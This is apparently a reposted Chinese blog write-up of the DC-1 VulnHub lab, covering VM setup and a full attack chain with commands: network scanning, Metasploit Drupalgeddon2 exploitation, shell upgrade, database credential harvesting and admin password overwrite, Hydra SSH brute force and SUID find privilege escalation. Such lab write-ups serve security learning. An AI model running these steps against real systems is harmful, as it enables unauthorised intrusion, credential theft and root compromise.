位置: IT常识 - 正文

DC-1靶场搭建及渗透实战详细过程(DC靶场系列)(upload靶场搭建)

编辑:rootadmin
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)

目录

一. 环境搭建

1. 准备工具

渗透利器kali

DC-1靶场机

2. 安装过程

二. 渗透过程

1. 信息收集

①探测目标IP地址

②探测目标IP开放端口 

③网页信息收集

2. 漏洞查找与利用

①漏洞查找

②漏洞利用

3. Getshell

①获取普通shell

②获取交互shell 

3. 数据库渗透

4. 用户密码爆破

5. Linux提权

三. 收获总结

1. 主机扫描

2. 域名信息收集

3. CMS漏洞找查及利用

4. Getshell

5. Linux特性及相关命令

6. 密码爆破与SSH

7. Linux系统的SUID提权


一. 环境搭建1. 准备工具渗透利器kali

推荐整理分享DC-1靶场搭建及渗透实战详细过程(DC靶场系列)(upload靶场搭建),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:dc-3靶场,dc-4靶机,搭建dvwa靶场,dc-3靶场,搭建dvwa靶场,dc-4靶机,dc系列靶机,dc-3靶场,内容如对您有帮助,希望把文章链接给更多的朋友!

可参考下面文章进行安装

Kali虚拟机安装,设置中文等详细教程,Linux最新免镜像版

DC-1靶场机

官网下载 https://download.vulnhub.com/dc/DC-1.zip

2. 安装过程

解压后得到个.ova文件

用vm虚拟机打开该文件

设置好相关操作

提示导入失败,不过没有关系点重试就好,导入完成后,打开DC-1虚拟机并等待,过程中别点进虚拟机里面

出现这个界面就表示开启成功 (渗透完得到密码就能登入啦),然后再更改kali的网络连接模式为桥接模式,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机,当然也可以设置为net,但必须DC-1靶机也设为net,不懂桥接模式的小伙伴建议参考

“桥接”和“NAT”方式区别 - 知乎 (zhihu.com)

二. 渗透过程

这一过程需要用到kali,打开我们的渗透利器kali(root模式下)

1. 信息收集①探测目标IP地址

探测主机的工具有很多,常见的有arp-scan、nmap还有netdiscover

arp-scanarp-scan -l

该命令是探测当前网段的所有ip地址

然后我们看一下DC靶机的Mac地址

确定了DC主机的IP地址为

192.168.120.128nmap

先看一下kali的ip地址

ifconfig

 再用nmap

nmap -sP 192.168.120.0/24

ip后面改为了0/24, 在这里“192.168.120.0/24”表示的是这个网段的IP地址从从192.168.120.1开始,到192.168.120.254结束(192.168.120.0和192.168.120.255有特殊含义不能当做ip地址);子网掩码是255.255.255.0

一样扫出了ip

netdiscovernetdiscover

②探测目标IP开放端口 

用nmap来探测

nmap -sV -p- 192.168.120.128

-sV  扫描目标主机端口上运行的软件信息

-p-  扫描全部端口0-65535

20和80端口是我们的突破口,80是http协议,我们用浏览器访问一下看看

③网页信息收集

利用火绒插件wappalyzer,查看站点信息,也可以自己判断,网页一看cms就是drupal

当然也可以用kali自带的工具whatweb扫

黑客工具之whatweb详细使用教程 - 知乎 (zhihu.com)

whatweb -v 192.168.120.128

 也能扫出CMS,然后再用dirsearch工具扫一下目录 ,命令

dirsearch -u 192.168.120.128 -e *

还是扫出了挺多目录的,但是暂时用不到,先放一放 

得到如下信息

CMS是Drupal Apache 2.2.22

PHP 5.4.45

jQuery 1.4.4 

2. 漏洞查找与利用

知道cms,我们一般从cms出发找漏洞,百度一下drupal漏洞 

果然有框架漏洞

①漏洞查找

用工具Metasploit(目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一),找一下漏洞,先打开工具

msfconsole

然后输入命令

search Drupal

可以看到这个cms框架还是有挺多漏洞的,这里我们利用漏洞等级较高的,且时间最新的18年那个漏洞

②漏洞利用

利用18年那个漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

 接着看一下该漏洞模块参数

show options

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set,但是没有内容

所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)

set RHOSTS 192.168.120.128

然后再show一下模块参数 

设置好参数后开始攻击

exploit

exploit和run是一样的,用run也可以

出现Meterpreter session 1 opened(kali和目标ip的连接)就说明攻击成功啦,接下来我们可以直接上shell

3. Getshell①获取普通shellshell

获取一下普通的shell 

然后执行ls命令

②获取交互shell 

这样看起来有点那啥,不过我们可以利用python实现互交shell,这样就好看一点,使用的前提是攻击主机上必须装有python

python -c 'import pty; pty.spawn("/bin/bash")'

可以看到这个shell的权限只是普通权限,还不是root,不过还能看看文件啦,先看一下发现的flag1.txt文件

tac flag1.txt

查看一下flag1.txt文件

每个好的CMS都需要一个配置文件,你也一样,emmm,这个先放着,看看还有没有其他flag文件

find / -name flag*

 好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行

cat `find / -name settings.php`

这里我们找到了flag2(好像不重要的样子),还意外收获了一个数据库,给了账号密码,先登一下看看

3. 数据库渗透

由上面得到的账号密码登入

mysql -udbuser -pR0ck3t

登进去了,这样我们就可以为所欲为修改数据库了,先看看有啥东西

show datebases;

 

接着使用改数据库,并查看表 

use drupaldb;show tables;

 

 注意到users这个表,看一下有啥,先改小一点字体,不然可能会挤爆不美观

select * from users;DC-1靶场搭建及渗透实战详细过程(DC靶场系列)(upload靶场搭建)

得到两个用户 

 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |

 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |

密码好复杂,应该不是明文,那想登进后台就很难了就很难了,我们可以通过修改admin的密码,或者是新加一个admin

参考:分享:忘记Drupal的管理员密码的解决办法 | Drupal China

法一:修改admin密码

我们得先找到加密文件,Drupal的加密脚本在

/var/www/scripts/password-hash.sh

目录下,我们先退出mysql

exit;

打开加密脚本

cat /var/www/scripts/password-hash.sh

这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456 

php /var/www/scripts/password-hash.sh 123456

得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

mysql -udbuser -pR0ck3tuse drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

密码修改成功 

法二:添加admin权限用户 

drupal7版本在有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

searchsploit drupal

然后看一下那个脚本path

searchsploit 34992.py -p

 

可以通过URL下载脚本使用,这里就不多展示了,接着我们用修改好的密码登入

 登进去就找到了flag3,提示了我们一些信息passwd和shadow,明显就是linux的文件

/etc/passwd

该文件存储了系统用户的基本信息,所有用户都可以对其进行文件操作读

Linux /etc/passwd内容解释(超详细)

/etc/shadow

该文件存储了系统用户的密码等信息,只有root权限用户才能读取

Linux /etc/shadow(影子文件)内容解析(超详细)

接着我们查看一下用户信息

tac /etc/passwd

可以看到有flag4这个用户,我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码

4. 用户密码爆破

事先参考SSH

SSH简介及两种远程登录的方法_Jack LDZ的博客-CSDN博客_ssh

利用工具Hydra爆破flag4的密码

(总结)Linux下的暴力密码在线破解工具Hydra详解

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.120.128

爆破出密码orange,然后我们用kali连接

ssh flag4@192.168.120.128

@192.168.120.128

@目标主机地址

输入orange登入

打开了flag4.txt,emmm其实好像也没啥

5. Linux提权

需要用到SUID提权,参考

简谈SUID提权 - FreeBuf网络安全行业门户

利用find命令,找查具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

find比较常用,可以执行root权限的命令找查文件,

find / -name index.php -exec "/bin/sh" \;

找查什么文件不重要(但是是存在的文件),只需要格式对,然后后面加上

-exec "/bin/sh" \;

#!/bin/sh简介 - feng..liu - 博客园 (cnblogs.com)

可以看到已经提权成功了,接下来我们只要找到剩下的flag文件就算通关啦

cd /rootlscat *

 

拿到第五个flag啦! 

三. 收获总结1. 主机扫描nmapnmap -sP 网段

Nmap命令详解

arp-scanarp-scan -l

arp-scan命令及ARP含义解释

netdiscovernetdiscover

Netdiscover网络扫描工具

2. 域名信息收集whatwebwhatweb -v 域名

 whatweb详细使用教程

 火绒扩展wappalyzer dirsearchdirsearch -u 域名

目录扫描工具 dirsearch 中文手册

3. CMS漏洞找查及利用Metasploit

先打开MSF控制台 

msfconsole

搜索CMS漏洞

search cms名

使用模块

use 漏洞模块名

显示模块参数(一般只需要设置攻击目标IP地址)

show options

设置模块参数

set 模块参数名 参数值

开始攻击

run(或exploit)

metasploit渗透测试入门

4. Getshell

使用MSF攻击等待主机与目标连接完成后

metasploit获取shell之后的进一步利用

通常情况下直接进入shell

shell

获取交互shell(需对方主机安装有python)

python -c 'import pty;pty.spawn("/bin/bash")'5. Linux特性及相关命令

查看权限(root为最高权限,其他为普通用户)

whoami

文件特性passwd与shadow

/etc/passwd

存储有用户的基本信息,如用户名、用户ID等,所有用户均可访问

Linux /etc/passwd内容解释(超详细)

/etc/shadow

存储有用户的密码等信息,需要root用户才能访问

Linux /etc/shadow(影子文件)内容解析(超详细)

6. 密码爆破与SSH

爆破工具Hydra

黑客工具之hydra详细使用教程 

以爆破SSH为例

hydra -l 指定用户名 -p 指定密码 ssh://目标主机hydra -L 用户字典 -P 密码字典 ssh://目标主机

爆破完后我们可以用kali登入

ssh 用户名@目标攻击主机

SSH简介及两种远程登录的方法

7. Linux系统的SUID提权

简谈SUID提权

先找到含有SUID权限的二进制文件

find / -user root -perm -4000 -print 2>/dev/null

这句命令的意思是找到SUID权限的二进制文件,将错误的垃圾信息过滤

find / -perm -4000 2>/dev/null      拆分讲解

再选择相关命令进行提权,以find为例(用得最多)

先ls查看当前目录文件,假设有文件x.ab,利用共有suid权限的find搭配exec进行提权

find / -name x.ab -exec "/bin/sh" \;
本文链接地址:https://www.jiuchutong.com/zhishi/287979.html 转载请保留说明!

上一篇:飞机上可以充电吗(上飞机可以带2个充电宝吗)

下一篇:从奎雷英山口看到的 Leum na Luirginn湖和Cleat湖,英国斯凯岛 (© Sebastian Wasek/Sime/eStock Photo)

  • 华为手机怎么关闭纯净模式(华为手机怎么关闭运行的程序)

    华为手机怎么关闭纯净模式(华为手机怎么关闭运行的程序)

  • qq空间小秘密下架了吗(2021qq空间小秘密入口在哪)

    qq空间小秘密下架了吗(2021qq空间小秘密入口在哪)

  • 苹果11手机怎么开双系统(苹果11手机怎么样好不好用)

    苹果11手机怎么开双系统(苹果11手机怎么样好不好用)

  • 华为手机高清通话怎么关闭(华为手机高清通话没有了)

    华为手机高清通话怎么关闭(华为手机高清通话没有了)

  • 华为freebuds3什么时候出(华为freebuds3什么芯片)

    华为freebuds3什么时候出(华为freebuds3什么芯片)

  • 剪映怎么遮挡局部(剪映怎么遮盖)

    剪映怎么遮挡局部(剪映怎么遮盖)

  • 华为手机小艺叫不出来(华为手机小艺叫不出来怎么回事)

    华为手机小艺叫不出来(华为手机小艺叫不出来怎么回事)

  • 借的充电宝不还会怎样(借的充电宝不还钱会怎么样)

    借的充电宝不还会怎样(借的充电宝不还钱会怎么样)

  • 荣耀手表3上市时间(荣耀手表上市时间顺序)

    荣耀手表3上市时间(荣耀手表上市时间顺序)

  • 开机滴滴滴三声无显示(开机滴滴滴三声响)

    开机滴滴滴三声无显示(开机滴滴滴三声响)

  • 微信群账号怎么查看(微信群账号怎么搜索)

    微信群账号怎么查看(微信群账号怎么搜索)

  • z390支持内存频率(z390-a支持内存频率)

    z390支持内存频率(z390-a支持内存频率)

  • 机顶盒有线网络连不上(机顶盒有线网络怎么设置)

    机顶盒有线网络连不上(机顶盒有线网络怎么设置)

  • 内存主要特点(内存的特点和作用)

    内存主要特点(内存的特点和作用)

  • 手机的中框是指什么(手机的中框是什么意思?)

    手机的中框是指什么(手机的中框是什么意思?)

  • 电脑如何登录微信公众号(电脑如何登录微软账户)

    电脑如何登录微信公众号(电脑如何登录微软账户)

  • beatsx怎么恢复设置

    beatsx怎么恢复设置

  • 快手小店必须要有淘宝店吗(快手小店必须要营业执照吗)

    快手小店必须要有淘宝店吗(快手小店必须要营业执照吗)

  • vivos1带红外遥控吗(vivos9有红外遥控)

    vivos1带红外遥控吗(vivos9有红外遥控)

  • 加绝对引用的快捷键(如何快速加绝对引用符号)

    加绝对引用的快捷键(如何快速加绝对引用符号)

  • 笔记本电脑闪屏是什么原因(笔记本电脑闪屏怎么解决)

    笔记本电脑闪屏是什么原因(笔记本电脑闪屏怎么解决)

  • 新版qq群名片在哪(qq群名片在哪?)

    新版qq群名片在哪(qq群名片在哪?)

  • qq闺蜜空间怎么设置(qq闺蜜空间怎么进去)

    qq闺蜜空间怎么设置(qq闺蜜空间怎么进去)

  • 华为手机可以投影吗(华为手机可以投屏到电视机上吗)

    华为手机可以投影吗(华为手机可以投屏到电视机上吗)

  • 微软 Win11 预览版已登陆 Azure 虚拟桌面:支持 TPM 2.0 和安全启动(微软win11预览版)

    微软 Win11 预览版已登陆 Azure 虚拟桌面:支持 TPM 2.0 和安全启动(微软win11预览版)

  • 科伯克谷国家公园里的驯鹿,阿拉斯加 (© Staffan Widstrand/Minden Pictures)(科克伯什么意思)

    科伯克谷国家公园里的驯鹿,阿拉斯加 (© Staffan Widstrand/Minden Pictures)(科克伯什么意思)

  • 2022 IEEE 编程语言榜单发布!Python 又双叒叕霸榜了,学 SQL 工作更吃香!(ieee compel 2021)

    2022 IEEE 编程语言榜单发布!Python 又双叒叕霸榜了,学 SQL 工作更吃香!(ieee compel 2021)

  • 记录转载:uni-app 请求 uni.request封装使用(uni appp)

    记录转载:uni-app 请求 uni.request封装使用(uni appp)

  • 期初未缴税额本年累计是什么意思
  • 生产成本月末结转到本年利润里吗
  • 行政事业单位核算短期投资时有关预算会计核算正确的是
  • 城镇垃圾处理费计入什么科目
  • 营业外支出计入
  • 外购商品用于促销能抵扣吗
  • 社保费用可以税前扣除吗
  • 原材料投资入股协议约定价值公允价值
  • 附加税里包括地税吗
  • 企业所得税汇算清缴时间
  • 免租要怎么交税
  • 纳税人如何办理纳税申报
  • 增值税附表一免税项目金额填不上
  • 自然人个税起征点2019税率表
  • 本金和利息分别出具借条
  • 公司必须开基本户才能开发票吗
  • 抵押,质押,留置的区别与联系
  • 收到政府补贴的装修款
  • 加入申请理由怎么写
  • scheduler.exe - scheduler是什么进程 有何作用
  • 销户余额转出总公司怎样记账
  • PHP:ftp_nb_continue()的用法_FTP函数
  • mac系统存储好大
  • vue for循环遍历对象取值
  • pace框架
  • 哈德良长城和中国长城的区别
  • 房产税是什么意思,简单的回答
  • vue带参数跳转到详情页面
  • 金融企业贷款损失
  • 发票确认平台勾选步骤
  • 发票失控进项转出
  • 农产品核定扣除增值税进项税额计算表
  • 红字发票信息表填好后再怎么操作
  • 合伙 利润分配
  • 上市公司净资产转正的方法
  • 税务法是否允许私人经营
  • 大陆工作的香港人可以开基金账户吗
  • mysql数据类型怎么判断
  • 预计可变现净值与账面成本的关系
  • 简易征收销售额是什么意思
  • 免税蔬菜交企业所得税吗
  • sql server功能选择
  • Mysql以utf8存储gbk输出的实现方法提供
  • 支付宝和微信的财务统计
  • 个体户是什么概念
  • 现金等价物的特征是
  • 阶段性减免企业社保费实施政策对象
  • 印花税如何计算缴纳
  • 衍生工具的作用是什么
  • 一年内到期的非流动负债是经营性负债吗
  • 礼品费属于什么费用
  • 建筑工程行业前景
  • 工会为员工购买水杯
  • 会计怎么核对出纳的日记账
  • 获取sql表达式时错误
  • sqlserver优化的几种方法
  • 如何重设路由器密码怎么办
  • googletoolbarnotifier.exe是什么进程?GoogleToolbarNotifier怎么关闭?
  • yAssistSe.exe是什么进程
  • Windows移动中心里没有无线网络
  • centos 7.6安装教程
  • ubuntu系统升级 开机黑屏怎么解决
  • linux 定时运行
  • windows 自启动
  • 在对linux系统中dir
  • win8平板玩lol
  • window无法正常启动怎么办
  • linux shell脚本实例
  • 如何删掉win7系统
  • perl格式化输出
  • perl随机数
  • js文件里面有什么
  • nodejs视频教程大集合
  • jQuery EasyUI之DataGrid使用实例详解
  • android点击事件onclick用法
  • js继承的方法
  • 钢结构蔬菜大棚造价多少钱一平方
  • 电子税务局怎么添加开票员
  • 企业交社保可以退税吗
  • 税收优惠政策有没有政府补助
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设